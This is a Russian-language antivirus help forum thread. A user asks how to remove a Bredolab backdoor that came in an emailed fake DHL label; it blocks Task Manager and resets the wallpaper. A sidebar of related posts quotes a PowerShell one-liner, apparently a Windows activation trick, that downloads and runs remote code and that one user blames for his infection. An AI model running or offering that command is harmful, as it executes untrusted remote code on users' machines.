Перейти к содержанию
Правила раздела

Новый вирус

bogdan10110

От bogdan10110
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

bogdan10110 Новичок

bogdan10110

Опубликовано
Опубликовано

День добрый.

По почте прислали вирус, его отослал в лабораторию.

Хотелось бы от него избавиться, блокирует диспетчер задач, заменяет фон рабочего стола на свой HTML, блокирует доступ к списку картинок для фона, т.е. поменять не дает. Перед запуском запустил его правой кнопкой "в безопасно среде", перед запуском проверил антивирусом и вирусов не обнаружилось. Касперским удалось разблокировать диспетчер задач, вирус всё равно его убивает видимо ищет findWindow по заголовку, сидит в трее с круглой красной иконкой. процесс smss32.exe убил и всё работает, зашел в msconfig убил из автозагрузки галку убрал и всё равно никак не избавиться. Делал полную проверку с максимальным уровнем защиты ничего не найдено, базы новые, мне не сложно обновлять их хоть каждый час, и перед проверкой обновлял, базы новые.

Этот вирус скорее всего лезет в библиотеки kernel и т.д. Где сидит этот вирус мне не известно, после перезагрузки то же самое, вирус оживает и приходится так же убивать его.

Что порекомендуете?

Ссылка на комментарий
Поделиться на другие сайты
bogdan10110 Новичок

bogdan10110

Опубликовано
  • Автор
Опубликовано
Если отослали в лабораторию и он действительно заражён ждите обновлений.

да, имя DHL_label_Nr38571.exe и размерчик в 66 кб с иконкой от блокнота. более чем на 50% я уверен что это вирус, а после того что он натворил это 100% вирус!

на С наверное написан с использованием API, вы же понимаете что это?

Ссылка на комментарий
Поделиться на другие сайты
bogdan10110 Новичок

bogdan10110

Опубликовано
  • Автор
Опубликовано

Спасибо.

Обновил базы только что и определил вирус в этом exe который я оставил в экспериментальных целях.

определил этот файл как Backdoor.Win32.Bredolab.bvb.

Быстро среагировала лаборатория. Спасибо.

Ссылка на комментарий
Поделиться на другие сайты
bogdan10110 Новичок

bogdan10110

Опубликовано
  • Автор
Опубликовано

не знаю о каких логах... вирус сидит и не убьтся никак, всё продолжает выводить alert сообщение при входе и менять фон рабочего тола на свой html который удалять бесполезно.а smss32 всё добавляется в автозагрузку в msconfig... блочит диспетчер задачь 'блоченно администратором'.. вот так вот у меня начинается запуск компьютера, сначала Ok ается alert окошко, затем каспером разблокирую диспетчер, дважды его вызываю потому что первую копию вирус убьет, убиваю процесс sms32 и из трея пропадает красный значок вируса. фон поменять не получается, список карин заблокирован. Можно попробовать удалить html и обновить экран.. но я уже под устал это делать.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • fertune
      Вирус dialer.exe
      От fertune
      Когда открываешь диспетчер задач то сначала ЦП грузит на 100% а потом на 10% я посмотрел через dr.web cureit и увидел то что это майнер dialer.exe, смотрел в интернете как пофиксить но никакие способы не помогли(может быть я что то делал неправильно)
      можете помочь с проблемой? Еще я пробовал его фиксить удаляя его но он опять появлялся и грузил ЦП на все 100%.
       
    • Temikst
      Поймал какой-то вирус
      От Temikst
      Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
      CollectionLog-2025.02.09-23.46.zip

       
      Даже браузер сильно тормозит. после открывание диспетчер задач сразу же лучше работает\
    • VanyeJ
      Вирус в PowerShell
      От VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
×
×
  • Создать...